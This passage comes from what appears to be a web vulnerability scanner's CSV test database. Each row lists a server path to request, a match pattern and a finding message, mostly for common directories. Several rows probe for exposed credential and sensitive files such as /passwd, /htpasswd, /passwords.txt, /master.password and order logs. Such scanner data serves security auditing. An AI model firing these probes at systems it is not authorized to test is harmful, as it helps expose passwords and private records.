interesting.\",\"\",\"\"\n\"001654\",\"3092\",\"1\",\"/easylog/easylog.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001655\",\"3092\",\"1\",\"/ejemplo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001656\",\"3092\",\"1\",\"/ejemplos/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001657\",\"3092\",\"1\",\"/employees/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001658\",\"3092\",\"1\",\"/envia/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001659\",\"3092\",\"1\",\"/enviamail/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001660\",\"3092\",\"1\",\"/error_log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001662\",\"3092\",\"1\",\"/excel/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001663\",\"3092\",\"1\",\"/Excel/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001664\",\"3092\",\"1\",\"/EXE/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001665\",\"3092\",\"1\",\"/exe/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001666\",\"3092\",\"1\",\"/fbsd/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001667\",\"3092\",\"1\",\"/file/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001668\",\"3092\",\"1\",\"/fileadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001669\",\"3092\",\"1\",\"/files/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001670\",\"3092\",\"1\",\"/forum/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001671\",\"3092\",\"1\",\"/forums/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001672\",\"3092\",\"1\",\"/foto/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001673\",\"3092\",\"1\",\"/fotos/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001674\",\"3092\",\"1\",\"/fpadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001675\",\"3092\",\"1\",\"/ftp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001676\",\"3092\",\"1\",\"/gfx/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001677\",\"3092\",\"1\",\"/global/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001678\",\"3092\",\"1\",\"/graphics/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001679\",\"3092\",\"1\",\"/guest/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001680\",\"3092\",\"1\",\"/guestbook/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001681\",\"3092\",\"1\",\"/guests/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001682\",\"3092\",\"1\",\"/hidden/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001683\",\"3092\",\"1\",\"/hitmatic/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001684\",\"3092\",\"1\",\"/hitmatic/analyse.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001685\",\"3092\",\"1\",\"/hits.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001686\",\"3092\",\"1\",\"/hit_tracker/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001687\",\"3092\",\"1\",\"/home/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001688\",\"3092\",\"1\",\"/homepage/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001689\",\"3092\",\"1\",\"/htdocs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001690\",\"3092\",\"1\",\"/html/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001691\",\"3092\",\"1\",\"/htpasswd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001692\",\"3092\",\"1\",\"/HyperStat/stat_what.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001693\",\"3092\",\"1\",\"/hyperstat/stat_what.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001694\",\"3092\",\"1\",\"/ibill/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001695\",\"3092\",\"1\",\"/idea/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001696\",\"3092\",\"1\",\"/ideas/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001697\",\"3092\",\"1\",\"/imagenes/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001698\",\"3092\",\"1\",\"/img/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001699\",\"3092\",\"1\",\"/imgs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001700\",\"3092\",\"1\",\"/import/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001701\",\"3092\",\"1\",\"/impreso/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001702\",\"3092\",\"1\",\"/includes/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001703\",\"3092\",\"1\",\"/incoming/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001704\",\"3092\",\"1\",\"/info/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001705\",\"3092\",\"1\",\"/informacion/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001706\",\"3092\",\"1\",\"/information/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001707\",\"3092\",\"1\",\"/ingresa/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001708\",\"3092\",\"1\",\"/ingreso/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001709\",\"3092\",\"1\",\"/install/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001710\",\"3092\",\"1\",\"/internal/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001711\",\"3092\",\"1\",\"/intranet/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001712\",\"3092\",\"1\",\"/invitado/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001713\",\"3092\",\"1\",\"/invitados/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001714\",\"3268\",\"2\",\"/java-plugin/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001715\",\"3092\",\"1\",\"/java/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001716\",\"3092\",\"1\",\"/jdbc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001717\",\"3092\",\"1\",\"/job/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001718\",\"3092\",\"1\",\"/jrun/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001719\",\"3092\",\"1\",\"/js\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001720\",\"3092\",\"1\",\"/lib/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001721\",\"3092\",\"1\",\"/library/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001722\",\"3092\",\"1\",\"/libro/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001723\",\"3092\",\"1\",\"/linux/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001724\",\"3092\",\"1\",\"/log.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001725\",\"3092\",\"1\",\"/log.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001726\",\"3092\",\"1\",\"/log.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001727\",\"3092\",\"1\",\"/logfile\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001728\",\"3092\",\"1\",\"/logfile.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001729\",\"3092\",\"1\",\"/logfile.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001730\",\"3092\",\"1\",\"/logfile.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001731\",\"3092\",\"1\",\"/logfile/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001732\",\"3092\",\"1\",\"/logfiles/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001733\",\"3092\",\"1\",\"/logger.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001734\",\"3092\",\"1\",\"/logger/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001735\",\"3092\",\"1\",\"/logging/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001736\",\"3092\",\"1\",\"/login/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001737\",\"3092\",\"1\",\"/logs.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001738\",\"3092\",\"1\",\"/logs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001739\",\"3092\",\"1\",\"/logs/access_log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001740\",\"3092\",\"1\",\"/logs/error_log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001741\",\"3092\",\"1\",\"/lost+found/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001742\",\"3092\",\"1\",\"/mail/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001743\",\"3092\",\"1\",\"/manage/cgi/cgiproc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001744\",\"3092\",\"1\",\"/marketing/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001745\",\"3092\",\"1\",\"/master.password\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001746\",\"3092\",\"1\",\"/mbox\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001747\",\"3092\",\"1\",\"/members/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001748\",\"3092\",\"1\",\"/message/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001749\",\"3092\",\"1\",\"/messaging/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001750\",\"3092\",\"1\",\"/ministats/admin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001751\",\"3092\",\"1\",\"/misc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001752\",\"3092\",\"1\",\"/mkstats/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001753\",\"3092\",\"1\",\"/movimientos/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001754\",\"3092\",\"1\",\"/mp3/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001755\",\"3092\",\"1\",\"/mqseries/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001756\",\"3092\",\"1\",\"/msql/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001757\",\"3092\",\"1\",\"/msword/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001758\",\"3092\",\"1\",\"/Msword/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001759\",\"3092\",\"1\",\"/MSword/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001760\",\"3092\",\"1\",\"/NetDynamic/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001761\",\"3092\",\"1\",\"/NetDynamics/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001762\",\"3092\",\"1\",\"/netscape/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001763\",\"3092\",\"1\",\"/new\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001764\",\"3092\",\"1\",\"/new/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001765\",\"3092\",\"1\",\"/news\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001767\",\"3092\",\"1\",\"/noticias/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001768\",\"3092\",\"1\",\"/odbc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001769\",\"3092\",\"1\",\"/officescan/cgi/jdkRqNotify.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001770\",\"3092\",\"1\",\"/old/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001771\",\"3092\",\"1\",\"/oracle\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001772\",\"3092\",\"1\",\"/oradata/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001773\",\"3092\",\"1\",\"/order/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001774\",\"3092\",\"1\",\"/orders/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001775\",\"3092\",\"1\",\"/orders/checks.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001776\",\"3092\",\"1\",\"/orders/mountain.cfg\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001777\",\"3092\",\"1\",\"/orders/orders.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001778\",\"3092\",\"1\",\"/orders/orders.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001779\",\"3092\",\"1\",\"/outgoing/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001780\",\"3092\",\"1\",\"/ows/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  Oracle Web Services?\",\"\",\"\"\n\"001781\",\"3092\",\"1\",\"/pages/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001782\",\"3092\",\"1\",\"/Pages/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001783\",\"3092\",\"1\",\"/passwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001784\",\"3092\",\"1\",\"/passwd.adjunct\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001785\",\"3092\",\"1\",\"/passwd.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001786\",\"3092\",\"1\",\"/passwdfile\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001787\",\"3092\",\"1\",\"/password\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001788\",\"3268\",\"2\",\"/password/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001789\",\"3092\",\"1\",\"/passwords.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001790\",\"3092\",\"1\",\"/passwords/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001791\",\"3092\",\"1\",\"/PDG_Cart/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001792\",\"3092\",\"1\",\"/people.list\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001793\",\"3092\",\"1\",\"/perl5/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001794\",\"3092\",\"1\",\"/php/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001795\",\"3092\",\"b\",\"@PHPMYADMINchangelog.php\",\"GET\",\"phpMyAdmin\\s\\-\\sChangeLog\",\"\",\"\",\"\",\"\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"001796\",\"3092\",\"b\",\"@PHPMYADMINChangeLog\",\"GET\",\"phpMyAdmin\\s-\\sChangeLog\",\"\",\"\",\"\",\"\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"001797\",\"3092\",\"1\",\"/pics/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001798\",\"3092\",\"1\",\"/piranha/secure/passwd.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001799\",\"3092\",\"1\",\"/pix/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001800\",\"3092\",\"1\",\"/poll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001801\",\"3092\",\"1\",\"/polls\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001802\",\"3092\",\"1\",\"/porn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001803\",\"3092\",\"1\",\"/pr0n/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001804\",\"3092\",\"1\",\"/privado/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001805\",\"3092\",\"1\",\"/private/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001806\",\"3092\",\"1\",\"/prod/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001807\",\"3092\",\"1\",\"/pron/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001808\",\"3092\",\"1\",\"/prueba/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001809\",\"3092\",\"1\",\"/pruebas/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001810\",\"3092\",\"1\",\"/pub/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001811\",\"3092\",\"1\",\"/public/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001812\",\"3092\",\"1\",\"/publica/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001813\",\"3092\",\"1\",\"/publicar/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001814\",\"3092\",\"1\",\"/publico/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001815\",\"3092\",\"1\",\"/purchase/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001816\",\"3092\",\"1\",\"/purchases/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001818\",\"3092\",\"1\",\"/pwd.db\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001819\",\"3092\",\"1\",\"/python/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001820\",\"3092\",\"1\",\"/readme\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001821\",\"3092\",\"1\",\"/README.TXT\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001822\",\"3092\",\"1\",\"/readme.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001823\",\"3092\",\"1\",\"/register/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001824\",\"3092\",\"1\",\"/registered/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001825\",\"3092\",\"1\",\"/reports/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001826\",\"3092\",\"1\",\"/reseller/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001827\",\"3092\",\"1\",\"/restricted/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001828\",\"3092\",\"1\",\"/retail/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001829\",\"3092\",\"1\",\"/reviews/newpro.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001830\",\"3268\",\"2\",\"/root/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001831\",\"3092\",\"1\",\"/sales/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001832\",\"3092\",\"1\",\"/sample/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001833\",\"3092\",\"1\",\"/samples/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001834\",\"3092\",\"1\",\"/save/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001835\",\"3092\",\"1\",\"/scr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001836\",\"3092\",\"1\",\"/scratch\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001837\",\"3092\",\"1\",\"/scripts/weblog\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001838\",\"3092\",\"1\",\"/search.vts\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001839\",\"3092\",\"1\",\"/search97.vts\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001840\",\"3092\",\"1\",\"/secret/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001841\",\"3268\",\"2\",\"/secure/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001842\",\"3268\",\"2\",\"/secured/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001843\",\"3092\",\"1\",\"/sell/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001844\",\"3268\",\"2\",\"/server_stats/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001845\",\"3092\",\"1\",\"/service/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001846\",\"3268\",\"2\",\"/services/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001847\",\"3092\",\"1\",\"/servicio/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001848\",\"3092\",\"1\",\"/servicios/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001849\",\"3092\",\"1\",\"/setup/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001850\",\"3092\",\"1\",\"/shop/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001851\",\"3092\",\"1\",\"/shopper/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001852\",\"3268\",\"2\",\"/software/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) 